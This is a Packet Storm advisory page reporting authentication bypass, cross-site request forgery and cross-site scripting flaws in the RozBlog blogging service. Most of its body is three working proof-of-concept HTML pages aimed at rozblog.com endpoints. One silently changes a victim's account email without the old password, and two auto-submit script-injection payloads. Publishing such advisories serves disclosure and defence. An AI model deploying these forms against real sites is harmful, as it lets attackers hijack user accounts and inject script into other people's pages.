what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

RozBlog Weblog Service Cross Site Request Forgery / Cross Site Scripting

RozBlog Weblog Service Cross Site Request Forgery / Cross Site Scripting
Posted Feb 24, 2016
Authored by Ehsan Hosseini

RozBlog Weblog Service suffers from cross site request forgery and cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss, csrf
SHA-256 | cd128fdb0719f9f0a5fc9b56517fee549a3bbce6ab7f755891643664f2240a7c

RozBlog Weblog Service Cross Site Request Forgery / Cross Site Scripting

Change Mirror Download
Document Title:
===============
RozBlog Weblog Service - Authentication Bypass / Cross Site Request
Forgery / Cross Site Scripting


References (Source):
====================
http://ehsansec.ir/advisories/rozblog-xsrf-xss-bypass.txt


Release Date:
=============
2016-02-23


Product & Service Introduction:
===============================
Roseblog is one of the most famous blogging services, it has many
special features that indicate you an interesting experience of
blogging.


Vulnerability Type:
=========================
Authentication Bypass
Cross Site Request Forgery
Cross Site Scripting

Vulnerability Details:
==============================
I discovered an authentication bypass(change Email) vulnerability and
a client-side cross site request forgery web
vulnerability and a cross site scripting vulnerability and in
RozBlog.com (Weblog Service).


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium




Proof of Concept (PoC):
=======================
-- Cross Site Request Forgery & Authentication Bypass --

-- PoC 1 --

-- To edit the e-mail users must first enter the old password on other
page, but with this exploit no longer requires it and bypass that. --

<html>
<head>
<title>Authentication Bypass - Csrf</title>
</head>
<body>
<form action="http://news.rozblog.com/Edit_Profile" method="post">
<input type="text" name="email" value="hacker@mail.com" >
<input type="text" name="name" value="Ehsan">
<input type="text" name="age" value="10">
<input type="text" name="site" value="http://ehsansec.ir/">
<input type="text" name="country" value="Country">
<input type="text" name="city" value="IRan">
<input type="text" name="about" value="About User">
<input type="text" name="yahoo" value="Yahoo Id">
<input type="text" name="password" value="123@abc">
<input type="submit" name="edit_profile" value="Attak">
</form>
</body>
</html>

-- PoC 2 --

<html>
<head>
<title>XSS - Csrf</title>
</head>
<body onload="document.contactfrm.submit()">
<form action="http://news.rozblog.com/Forum/Send/Message/"
name="contactfrm" method="post">
<input type="text" name="singer" value='"><img src=x onerror=alert(1)>'>
<input type="text" name="subject" value='"><img src=x onerror=alert(2)>'>
<input type="text" name="message" value='"></textarea><img src=x
onerror=alert(3)>'>
</form>
</body>
</html>

-- PoC 3 --

-- Cross Site Scripting --

-- For action attribute enter address of weblog or one of rozblog.com domains --

<html>
<head>
<title>Cross Site Scripting</title>
</head>
<body onload="document.info.submit()">
<form action='http://rozblog.com/View_Temp' method='POST'
name='info'>
<input name="c" id="c" value="2" type="hidden">
<input name='themecode' value="<script>alert('Ehsan')</script>">
</form>
</body>
</html>


Author:
==================
Ehsan Hosseini
http://ehsansec.ir/

SPX tnx to:
===========
Bl4ck_mohajem
Alireza


Contact:
========
hehsan979@gmail.com
info@ehsansec.ir
Login or Register to add favorites

File Archive:

August 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    15 Files
  • 2
    Aug 2nd
    22 Files
  • 3
    Aug 3rd
    0 Files
  • 4
    Aug 4th
    0 Files
  • 5
    Aug 5th
    0 Files
  • 6
    Aug 6th
    0 Files
  • 7
    Aug 7th
    0 Files
  • 8
    Aug 8th
    0 Files
  • 9
    Aug 9th
    0 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    0 Files
  • 12
    Aug 12th
    0 Files
  • 13
    Aug 13th
    0 Files
  • 14
    Aug 14th
    0 Files
  • 15
    Aug 15th
    0 Files
  • 16
    Aug 16th
    0 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close